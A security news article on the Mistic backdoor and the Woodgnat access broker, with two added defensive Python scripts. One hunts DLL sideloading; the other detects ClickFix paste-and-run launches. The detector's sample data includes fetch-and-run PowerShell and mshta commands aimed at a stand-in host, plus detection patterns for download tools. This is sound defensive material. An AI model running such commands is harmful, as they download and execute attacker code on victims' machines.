Be on the lookout for Mistic, a new backdoor used by ransomware broker

Researchers have identified a new backdoor program that has been used in enterprise intrusions since April and appears to be linked to an initial access broker that sells network footholds to ransomware gangs.

Dubbed Mistic by researchers from Symantec, the malware program has been deployed on networks belonging to organizations from multiple sectors, including insurance, education, IT, and professional services. In some cases it has been used alongside ModeloRAT, a piece of malware written in Python that’s associated with threat actor Woodgnat, also known as KongTuke.

“Woodgnat reportedly functions primarily as an IAB [initial access broker],” the Symantec researchers said in their report. “Its goal is not to deliver the final payload, but to establish highly durable remote access within an enterprise and sell this high-level access to ransomware affiliates and other attackers for a fee. The Symantec Threat Hunter Team has observed ModeloRAT being used in attacks delivering the Qilin ransomware.”

Woodgnat has been operating since at least May 2024 and has served multiple ransomware gangs over the past two years, including Interlock, Rhysida, Akira, 8Base, and Black Basta. Its attacks are largely opportunistic: victims are web visitors who get routed through a variety of ClickFix social engineering campaigns.

A backdoor with credential stealing capabilities

The Mistic backdoor is launched through a technique called DLL sideloading, where a legitimate executable belonging to another program is executed first and searches for a DLL of a particular name to load into memory. This is a very popular technique for avoiding detection, as many legitimate programs perform dynamic DLL searches across multiple folders and are vulnerable to DLL poisoning.

Ironically, in this case the attackers deliver and execute a file called MpExtMs.exe, which is digitally signed and belongs to Microsoft Defender. This file searches for a DLL called version.dll, which in turn searches for and loads another one called EndpointDlp.dll. The attackers have named their backdoor EndpointDlp.dll so that it gets loaded directly into memory.
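The loader behaviour described above (application directory searched before the system directory) also gives defenders a simple thing to hunt for: a DLL that should only exist in the Windows system directory sitting next to an executable somewhere else. The following script is an added example written for this article, not code from Symantec or from the report; it builds a constructed directory tree that mirrors the MpExtMs.exe / version.dll / EndpointDlp.dll layout, then flags any application-folder copy of a system DLL whose hash differs from the copy in the system directory. The `SYSTEM_DLL_NAMES` list and the demo file contents are assumptions for illustration, and `system_dir` would be `C:\Windows\System32` on a real host.

```python
"""Hunt for DLL sideloading candidates on disk.

Added example (not from the Symantec report). The Windows loader searches
the application directory before the system directory, so a copy of a
system DLL such as version.dll placed beside an executable is loaded
instead of the genuine one. This check walks a tree and flags such copies
when no system copy exists or the on-disk copy differs from the system copy.
"""
import hashlib
import os
import tempfile
from pathlib import Path

# Illustrative set of DLL names that normally live in System32 and are
# commonly abused for sideloading (assumption: extend for your estate).
SYSTEM_DLL_NAMES = {"version.dll", "dbghelp.dll", "wtsapi32.dll", "cryptbase.dll"}


def sha256_of(path: Path) -> str:
    """Stream a file through SHA-256 and return the hex digest."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def find_sideload_candidates(root: Path, system_dir: Path) -> list:
    """Walk `root`; return one finding per suspicious system-named DLL beside an .exe."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        exes = sorted(f for f in files if f.lower().endswith(".exe"))
        if not exes:
            continue  # no executable here, so nothing would search this directory
        dlls = sorted(f for f in files if f.lower().endswith(".dll"))
        for fname in dlls:
            if fname.lower() not in SYSTEM_DLL_NAMES:
                continue
            candidate = Path(dirpath) / fname
            system_copy = system_dir / fname
            if not system_copy.is_file():
                reason = "no system copy to compare against"
            elif sha256_of(candidate) != sha256_of(system_copy):
                reason = "hash differs from system copy"
            else:
                continue  # identical to the system DLL: a redistributed copy, not a sideload
            findings.append({
                "dll": str(candidate),
                "reason": reason,
                "executables": exes,
                # Other DLLs in the same folder are useful context: in the article's
                # chain the real payload is the second-stage EndpointDlp.dll.
                "sibling_dlls": [d for d in dlls if d != fname],
            })
    return findings


def demo() -> list:
    """Build a constructed tree mirroring the article's chain and scan it."""
    base = Path(tempfile.mkdtemp(prefix="sideload-demo-"))
    system_dir = base / "System32"
    system_dir.mkdir()
    (system_dir / "version.dll").write_bytes(b"constructed: genuine version.dll stand-in")

    bad = base / "apps" / "suspicious"
    bad.mkdir(parents=True)
    (bad / "MpExtMs.exe").write_bytes(b"constructed: signed host binary stand-in")
    (bad / "version.dll").write_bytes(b"constructed: attacker-controlled stand-in")
    (bad / "EndpointDlp.dll").write_bytes(b"constructed: second-stage stand-in")

    good = base / "apps" / "benign"
    good.mkdir()
    (good / "tool.exe").write_bytes(b"constructed: some other program")
    (good / "version.dll").write_bytes(b"constructed: genuine version.dll stand-in")

    return find_sideload_candidates(base / "apps", system_dir)


if __name__ == "__main__":
    for finding in demo():
        print(finding["dll"], "->", finding["reason"], "| siblings:", finding["sibling_dlls"])
```

Only the `suspicious` folder is reported: the `benign` folder ships a copy of version.dll that is byte-for-byte identical to the system one, which is what a legitimately redistributed DLL looks like. On a real host you would additionally check the Authenticode signature of both the host executable and the DLL, which is omitted here to keep the example portable.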

The backdoor itself reaches out to a command-and-control (C2) server and can execute code delivered from it directly in memory, without saving any file on disk. Other features include the ability to write, delete, and move files on the victim machine and to download and upload files to the C2 server.

The researchers have also observed a credential-stealing .NET DLL being downloaded and executed on victims’ networks, in addition to ModeloRAT. Common system tools used by the attackers include curl, reg.exe, net.exe, PowerShell, certutil.exe, and the Windows Management Instrumentation command-line tool (WMIC).

“The fact that Mistic executes in memory and also has a kill switch built in means that it is very stealthy, potentially allowing for long-term, stealthy access for attackers,” the researchers said.

ClickFix infection chains

The Woodgnat group’s attack campaigns often involve tricking users into executing malicious PowerShell commands on their own computers. The social engineering tricks vary: some campaigns display fake CAPTCHA tests on websites, while others crash the user’s browser and ask them to paste commands to fix the crash.

Since April, the attackers have also started messaging victims on Microsoft Teams, impersonating IT support staff and guiding them through a series of malicious paste-and-run steps.
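Whether the lure is a fake CAPTCHA, a fake browser crash, or a Teams chat with fake IT support, the chain ends the same way: the user pastes a command into the Run dialog or a console, so explorer.exe spawns a script host with an unusual command line. The following detection logic is an added example, not part of the article or of the Symantec report. It scores constructed process-creation records (the field names `image`, `parent_image`, `command_line` and `pid` are assumptions loosely modelled on Sysmon event 1 and EDR telemetry) and raises an alert only when a script host launched from explorer.exe also shows at least one content signal such as a hidden window, an encoded command, or an inline download. The sample command lines and the `lure.example.invalid` host are constructed for the demo.

```python
"""Flag paste-and-run (ClickFix) launches in process-creation telemetry.

Added example, not from the article or the Symantec report. Field names
and sample events are assumptions constructed for the demo.
"""
import re
from typing import Optional

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
RUN_DIALOG_PARENTS = {"explorer.exe"}  # Win+R and File Explorer launches are children of explorer.exe

# Content signals typical of a pasted one-liner; each is (name, case-insensitive regex).
SIGNALS = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("encoded_command", re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("inline_download", re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|curl|certutil)\b", re.I)),
    ("inline_execute", re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("bypass_policy", re.compile(r"-ep\s+bypass|-executionpolicy\s+bypass", re.I)),
    ("remote_url", re.compile(r"https?://", re.I)),
]


def basename(path: str) -> str:
    """Return the lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event: dict) -> Optional[dict]:
    """Return an alert dict for a suspicious script-host launch, else None."""
    image = basename(event["image"])
    if image not in SCRIPT_HOSTS:
        return None
    hits = [name for name, rx in SIGNALS if rx.search(event["command_line"])]
    if basename(event["parent_image"]) in RUN_DIALOG_PARENTS:
        hits.append("launched_from_explorer")
    # A console opened by hand from explorer.exe has exactly one hit and is ignored;
    # scripted automation under services.exe never gets the explorer hit at all.
    if "launched_from_explorer" not in hits or len(hits) < 2:
        return None
    return {"pid": event["pid"], "image": image, "hits": hits}


def scan(events) -> list:
    """Score every event and keep the alerts."""
    return [alert for alert in (score_event(e) for e in events) if alert]


# Constructed sample telemetry: one ClickFix-style PowerShell paste, one plain console
# launch, one scheduled admin script, one unrelated program, and one mshta variant.
SAMPLE_EVENTS = [
    {"pid": 1001, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell -w hidden -c "irm https://lure.example.invalid/verify | iex"'},
    {"pid": 1002, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"'},
    {"pid": 1003, "parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
    {"pid": 1004, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "command_line": r"notepad.exe C:\Users\alice\notes.txt"},
    {"pid": 1005, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta https://lure.example.invalid/fix"},
]


def demo() -> list:
    """Run the scan over the constructed sample and return the alerts."""
    return scan(SAMPLE_EVENTS)


if __name__ == "__main__":
    for alert in demo():
        print(alert["pid"], alert["image"], ", ".join(alert["hits"]))
```

Events 1001 and 1005 are reported; 1002 (a user opening a console) and 1003 (an admin script run by a service) are not, which is the trade-off this rule makes: it keys on the Run-dialog parent rather than on PowerShell arguments alone, so ordinary administrative automation does not drown the ClickFix pattern.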

“While the initial compromise may be opportunistic, the attackers profile the machines for potential interest to determine their value and if they can sell access to them,” the researchers said.

The Mistic backdoor is the latest example of initial access brokers and ransomware gangs returning to the use of custom malware tools they developed in-house instead of solely relying on living-off-the-land and dual-use system administration tools.

The Symantec report includes a list of indicators of compromise for this new backdoor and other malicious files and IP addresses used in the recent Woodgnat attacks.
